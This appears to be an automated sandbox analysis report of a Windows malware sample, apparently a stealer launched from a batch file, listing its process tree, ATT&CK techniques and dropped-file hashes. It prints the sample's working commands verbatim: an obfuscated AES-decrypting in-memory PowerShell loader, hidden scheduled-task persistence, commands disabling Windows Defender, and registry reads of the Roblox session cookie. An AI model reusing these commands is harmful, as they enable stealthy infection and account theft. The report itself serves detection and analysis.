  2⤵
  PID:752
- C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
  C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
  2⤵
  PID:1880
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:1636
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:3900
- C:\Windows\System32\RuntimeBroker.exe
  C:\Windows\System32\RuntimeBroker.exe -Embedding
  2⤵
  PID:3452
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca
  2⤵
  PID:364
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:928
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:4056
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:2312
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:2204
- C:\Windows\system32\BackgroundTransferHost.exe
  "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
  2⤵
  PID:1492
- C:\Windows\system32\backgroundTaskHost.exe
  "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
  2⤵
  PID:716
- C:\Windows\system32\BackgroundTaskHost.exe
  "C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
  2⤵
  PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:920

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:968

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1108

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1416

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1424

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1580

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1700

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1860

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1980

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2024

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2420

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2464

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2732

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:2800

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
PID:3384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4x loader.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIZJ/fa36vhtj27ozFjL7g05WCcUpC8LyRKGfAzheCI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZVv8E75OjoswS6cd03dUWw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nLrzP=New-Object System.IO.MemoryStream(,$param_var); $ZuaJS=New-Object System.IO.MemoryStream; $UKkLU=New-Object System.IO.Compression.GZipStream($nLrzP, [IO.Compression.CompressionMode]::Decompress); $UKkLU.CopyTo($ZuaJS); $UKkLU.Dispose(); $nLrzP.Dispose(); $ZuaJS.Dispose(); $ZuaJS.ToArray();}function execute_function($param_var,$param2_var){ $PHFYc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SFSaA=$PHFYc.EntryPoint; $SFSaA.Invoke($null, $param2_var);}$yGKMo = 'C:\Users\Admin\AppData\Local\Temp\4x loader.bat';$host.UI.RawUI.WindowTitle = $yGKMo;$smymX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yGKMo).Split([Environment]::NewLine);foreach ($pgxRZ in $smymX) { if ($pgxRZ.StartsWith('KeyfbtTtfpIEwotnLZXq')) { $naPbf=$pgxRZ.Substring(20); break; }}$payloads_var=[string[]]$naPbf.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:3588
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2396
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_464_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5080
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:1368
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:364
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1636
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:4252
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QIZJ/fa36vhtj27ozFjL7g05WCcUpC8LyRKGfAzheCI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZVv8E75OjoswS6cd03dUWw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $nLrzP=New-Object System.IO.MemoryStream(,$param_var); $ZuaJS=New-Object System.IO.MemoryStream; $UKkLU=New-Object System.IO.Compression.GZipStream($nLrzP, [IO.Compression.CompressionMode]::Decompress); $UKkLU.CopyTo($ZuaJS); $UKkLU.Dispose(); $nLrzP.Dispose(); $ZuaJS.Dispose(); $ZuaJS.ToArray();}function execute_function($param_var,$param2_var){ $PHFYc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $SFSaA=$PHFYc.EntryPoint; $SFSaA.Invoke($null, $param2_var);}$yGKMo = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_464.bat';$host.UI.RawUI.WindowTitle = $yGKMo;$smymX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($yGKMo).Split([Environment]::NewLine);foreach ($pgxRZ in $smymX) { if ($pgxRZ.StartsWith('KeyfbtTtfpIEwotnLZXq')) { $naPbf=$pgxRZ.Substring(20); break; }}$payloads_var=[string[]]$naPbf.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:1648
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2784
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Command.bat" "
        7⤵
        
        PID:1472
        
        C:\Windows\system32\net.exe
        
        net file
        8⤵
        
        PID:4704
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        9⤵
        
        PID:3144
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FwysrSAaFvkpYGzsT6O/S5eMkWCg1bBowjSAlFJoASA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3sJDCdEktqFLh8xdyxQUKg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GdyUz=New-Object System.IO.MemoryStream(,$param_var); $UiXtU=New-Object System.IO.MemoryStream; $HLEIw=New-Object System.IO.Compression.GZipStream($GdyUz, [IO.Compression.CompressionMode]::Decompress); $HLEIw.CopyTo($UiXtU); $HLEIw.Dispose(); $GdyUz.Dispose(); $UiXtU.Dispose(); $UiXtU.ToArray();}function execute_function($param_var,$param2_var){ $IBIaY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WCAzB=$IBIaY.EntryPoint; $WCAzB.Invoke($null, $param2_var);}$wunSX = 'C:\Users\Admin\AppData\Local\Temp\Command.bat';$host.UI.RawUI.WindowTitle = $wunSX;$XCEUs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wunSX).Split([Environment]::NewLine);foreach ($YsGUK in $XCEUs) { if ($YsGUK.StartsWith('XPmoVERZhStvHviujjTr')) { $bvkRK=$YsGUK.Substring(20); break; }}$payloads_var=[string[]]$bvkRK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        8⤵
        
        PID:3092
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_741_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_741.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1392
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_741.vbs"
        9⤵
        Checks computer location settings
        
        PID:1748
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_741.bat" "
        10⤵
        
        PID:4756
        
        C:\Windows\system32\net.exe
        
        net file
        11⤵
        
        PID:116
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        12⤵
        
        PID:3620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FwysrSAaFvkpYGzsT6O/S5eMkWCg1bBowjSAlFJoASA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3sJDCdEktqFLh8xdyxQUKg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GdyUz=New-Object System.IO.MemoryStream(,$param_var); $UiXtU=New-Object System.IO.MemoryStream; $HLEIw=New-Object System.IO.Compression.GZipStream($GdyUz, [IO.Compression.CompressionMode]::Decompress); $HLEIw.CopyTo($UiXtU); $HLEIw.Dispose(); $GdyUz.Dispose(); $UiXtU.Dispose(); $UiXtU.ToArray();}function execute_function($param_var,$param2_var){ $IBIaY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WCAzB=$IBIaY.EntryPoint; $WCAzB.Invoke($null, $param2_var);}$wunSX = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_741.bat';$host.UI.RawUI.WindowTitle = $wunSX;$XCEUs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($wunSX).Split([Environment]::NewLine);foreach ($YsGUK in $XCEUs) { if ($YsGUK.StartsWith('XPmoVERZhStvHviujjTr')) { $bvkRK=$YsGUK.Substring(20); break; }}$payloads_var=[string[]]$bvkRK.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        11⤵
        
        PID:224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        11⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in Drivers directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:4960
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        12⤵
        
        PID:1780
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:4060
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        12⤵
        
        PID:1776
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        12⤵
        
        PID:2964
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        12⤵
        
        PID:4752
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        12⤵
        
        PID:1956
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        12⤵
        
        PID:4248
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        12⤵
        Detects videocard installed
        
        PID:1936
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        7⤵
        
        PID:1368
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 1204
        8⤵
        Program crash
        
        PID:716
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /4
  2⤵
  - Checks SCSI registry key(s)
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3536

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:1940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:5016

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:4684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
- Checks processor information in registry
PID:828

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1368 -ip 1368
1⤵
PID:1256

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
a26df49623eff12a70a93f649776dab7

SHA1
efb53bd0df3ac34bd119adf8788127ad57e53803

SHA256
4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

SHA512
e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
ba98f98e87b33fe33ee775853d0339d7

SHA1
a9a026fb27def50e65a81996bff036b4c502c291

SHA256
7ded1f66cd159b68c43eb86732e48aa0145747aa11530824214c5759b3c170bb

SHA512
af843e116df6bd368ecdabd5331edf0ad0b0e179c0adfa03bd4926c58a2e80bab0d6a650e17efba7a6074749855902cc2d0eaa5139f598c209a26e19781577cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
3KB

MD5
ed8dbe211c8e4dab6736027728cf0d86

SHA1
319dc1850f4e09da0ccb8b50ae1b8b22c445877c

SHA256
3f3d7ac5a487e4bc1ba353d0e777f147cebffd9d0ebe26ba33f91bf35a880b25

SHA512
1a4cbba2f1be20480562eba1b2b8b210d794742a0a3a3dd6daf1ce66494ca1796dab7940ad0494679b6f4a76cb7ecb413995d9c01a615a6351cb258a4fe85cd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
005bc2ef5a9d890fb2297be6a36f01c2

SHA1
0c52adee1316c54b0bfdc510c0963196e7ebb430

SHA256
342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d

SHA512
f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
12c844ed8342738dacc6eb0072c43257

SHA1
b7f2f9e3ec4aaf5e2996720f129cd64887ac91d7

SHA256
2afeb7db4e46d3c1524512a73448e9cd0121deec761d8aa54fa9fe8b56df7519

SHA512
e3de9103533a69cccc36cd377297ba3ec9bd7a1159e1349d2cc01ab66a88a5a82b4ee3af61fab586a0cdfab915c7408735439fd0462c5c2cc2c787cb0765766a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c8c29f1f588816cb69fcebf642891720

SHA1
968d91f771b5e235c91952025509479c4456b44e

SHA256
2e1d2b0a86abe46d40843dbc522f6c9891671b21c1ac61e21d32f7245a93eb8b

SHA512
6b19696757654762ec551388c04142d4404892314c3e8a811b3260834dd6110b57be9aa4a0497ff579a4936c91cbdfbf7a938f676ee24e7476ecdd1b668cac3a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
5ae6535f0a379e0d7d5abab83390d5c5

SHA1
f8231cd53b365100f267f7b4c17b985671057bad

SHA256
